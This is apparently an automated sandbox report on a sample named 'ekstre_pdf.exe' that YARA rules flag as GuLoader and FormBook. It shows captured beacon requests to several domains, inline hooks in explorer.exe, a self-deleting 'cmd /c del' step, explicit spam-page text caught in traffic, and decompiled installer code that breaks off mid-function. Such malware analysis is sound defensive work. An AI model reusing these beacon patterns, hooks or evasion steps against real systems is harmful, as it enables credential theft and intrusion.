32 38 32 33 3b 26 23 32 35 37 34 35 3b 26 23 32 34 33 32 30 3b 26 23 32 38 37 34 38 3b 26 23 32 38 33 38 35 3b 26 23 32 37 39 38 37 3b 26 23 32 37 39 37 34 3b 26 23 31 31 30 3b 26 23 31 31 32 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 35 39 36 38 3b 26 23 32 33 33 39 38 3b 26 23 33 35 38 33 38 3b 26 23 32 30 31 39 35 3b 26 23 33 34 39 32 30 3b 26 23 33 36 32 37 36 3b 26 23 31 39 39 37 39 3b 26 23 33 35 37 35 33 3b 26 23 32 35 31 30 35 3b 26 23 32 36 37 34 32 3b 26 23 33 30 33 34 30 3b 26 23 32 30 33 31 36 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 32 38 39 39 3b 26 23 32 30 31 35 34 3b 26 23 31 39 39 37 39 3b 26 23 33 37 30 39 36 3b 26 23 33 38 35 34 34 3b 26 23 33 31 31 36 39 3b 26 23 32 35 31 37 30 3b 26 23 32 34 33 32 30 3b 26 23 32 32 32 37 30 3b 26 23 32 39 32 35 35 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 38 31 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 35 32 36 35 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 2c 26 23 32 30 30 31 33 3b 26 23 32 32 32 36 39 3b 26 23 33 32 37 36 39 3b 26 23 32 32 38 32 36 3b 26 23 32 33 31 31 30 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 39 38 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 26 23 31 32 30 3b 2c 26 23 32 39 30 38 37 3b 26 23 32 32 39 31 39 3b 26 23 32 30 31 35 34 3b 26 Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>数学课代表趴下让我桶的作文,女人下部隐私扒开图片,久久不见久久见中文字幕免费,中国老太婆bbbbbxxxxx,熟妇人妻激情偷爽文,娇嫩粗大撑开灌满浓浆np</title><meta name="keywords" content="数学课代表趴下让我桶的作文,女人下部隐私扒开图片,久久不见久久见中文字幕免费,中国老太婆bbbbbxxxxx,熟妇人&
Apr 11, 2023 09:51:16.457477093 CEST	539	IN	Data Raw: 23 32 32 39 37 31 3b 26 23 32 38 36 30 38 3b 26 23 32 34 37 37 33 3b 26 23 32 30 35 39 39 3b 26 23 32 39 32 34 35 3b 26 23 32 35 39 39 31 3b 2c 26 23 32 33 30 34 37 3b 26 23 32 33 32 37 33 3b 26 23 33 31 38 39 35 3b 26 23 32 32 38 32 33 3b 26 23 Data Ascii: #22971;激情偷爽文,娇嫩粗大撑开灌满浓浆np" /><meta name="description" content="数学课代表趴下&#35753

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49863	185.53.179.90	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 11, 2023 09:51:57.915657043 CEST	553	OUT	GET /mi94/?3fK0g=JxoL4&_N6l56=tM0cIu22lGNJS/LLx6gRwRxjNM5U60YmJux6FPvQAEnMOjJPh3bRcysDmxXQITeHVyGL HTTP/1.1 Host: www.furniture-42269.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 11, 2023 09:51:57.934179068 CEST	554	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Tue, 11 Apr 2023 07:51:57 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	49865	62.149.128.45	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 11, 2023 09:52:36.383568048 CEST	568	OUT	GET /mi94/?3fK0g=JxoL4&_N6l56=GzonJysSCxRGkwuMNYAbGaaQ0mJlLDwvvbsPrzKkAvYoJl+ajLQ6kQQMPxWrYSJRg4EW HTTP/1.1 Host: www.iltuosentiero.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 11, 2023 09:52:36.408502102 CEST	569	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Tue, 11 Apr 2023 07:52:35 GMT Connection: close Content-Length: 5048 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co
Apr 11, 2023 09:52:36.408581972 CEST	570	IN	Data Raw: 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a Data Ascii: lor:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;
Apr 11, 2023 09:52:36.408643961 CEST	572	IN	Data Raw: 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e Data Ascii: ;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is
Apr 11, 2023 09:52:36.408704996 CEST	573	IN	Data Raw: 3b 49 49 53 20 57 65 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 Data Ascii: ;IIS Web Core</td></tr> <tr><th>Notification</th><td>   MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>   StaticFile</td></tr> <tr><th>Error Code</th><td>   0x8007000
Apr 11, 2023 09:52:36.432599068 CEST	573	IN	Data Raw: 37 30 45 72 72 6f 72 3d 34 30 34 2c 30 2c 30 78 38 30 30 37 30 30 30 32 2c 39 36 30 30 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 26 72 61 71 75 6f 3b 3c 2f 61 3e 3c 2f 70 3e 20 0a 20 20 20 0a 20 3c 2f 66 69 65 6c 64 Data Ascii: 70Error=404,0,0x80070002,9600">View more information »</a></p> </fieldset> </div> </div> </body> </html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xE8
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xE8
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xE8
GetMessageA	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xE8

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ekstre_pdf.exePID: 6632, Parent PID: 4676

General

Target ID:	0
Start time:	09:47:31
Start date:	11/04/2023
Path:	C:\Users\user\Desktop\ekstre_pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ekstre_pdf.exe
Imagebase:	0x400000
File size:	315768 bytes
MD5 hash:	A37DC47F86E84E5D0D2E6414C3CD5272
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3005389294.00000000052B5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ekstre_pdf.exePID: 3132, Parent PID: 6632

General

Target ID:	1
Start time:	09:48:04
Start date:	11/04/2023
Path:	C:\Users\user\Desktop\ekstre_pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ekstre_pdf.exe
Imagebase:	0x400000
File size:	315768 bytes
MD5 hash:	A37DC47F86E84E5D0D2E6414C3CD5272
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.3098397307.0000000033D00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.3098023975.0000000033CD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 4676, Parent PID: 3132

General

Target ID:	2
Start time:	09:48:16
Start date:	11/04/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6937c0000
File size:	4849904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000002.00000002.7576128335.000000000AEC7000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: autoconv.exePID: 9804, Parent PID: 4676

General

Target ID:	3
Start time:	09:48:22
Start date:	11/04/2023
Path:	C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autoconv.exe
Imagebase:	0x270000
File size:	851968 bytes
MD5 hash:	469594005E3B94C5945BCCE7FC521C05
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6400, Parent PID: 4676

General

Target ID:	4
Start time:	09:48:23
Start date:	11/04/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0xff0000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.7553757751.0000000000650000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.7554321091.0000000000690000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.7552780025.0000000000190000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6844, Parent PID: 6400

General

Target ID:	5
Start time:	09:48:26
Start date:	11/04/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\ekstre_pdf.exe"
Imagebase:	0xff0000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3348, Parent PID: 6844

General

Target ID:	6
Start time:	09:48:26
Start date:	11/04/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff784460000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: ekstre_pdf.exePID: 6632, Parent PID: 4676COMMON

Execution Graph

Execution Coverage:	21%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.2%
Total number of Nodes:	1578
Total number of Limit Nodes:	38

Executed Functions

Function 0040352D Relevance: 79.2, APIs: 33, Strings: 12, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				signed int _t234;

				0x4cc000 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x47afb8 = _v324.dwBuildNumber;
				 *0x47afbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x47afbe != 0x600) {
					_t180 = E0040690A(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E0040689A(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E0040690A(0xb);
				 *0x47af04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x47afbc =  *0x47afbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x47afc0 = _t88;
				SHGetFileInfoW(0x440228, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040653D(0x472f00, L"NSIS Error");
				E0040653D(0x4cc000, GetCommandLineW());
				_t94 = 0x4cc000;
				_t234 = 0x22;
				 *0x47af00 = 0x400000;
				if( *0x4cc000 == _t234) {
					_t94 = 0x4cc002;
				}
				_t199 = CharNextW(E00405E39(_t94, 0x4cc000));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E39(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Dialectical\\Kombinationsuddannelserne\\Chronogramme", _t199);
										L37:
										GetTempPathW(0x2000, 0x4e0000);
										_t116 = E004034FC(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(0x4dc000); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403B12();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x47af94 == _t189) {
														L77:
														_t120 =  *0x47afac;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E0040690A(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
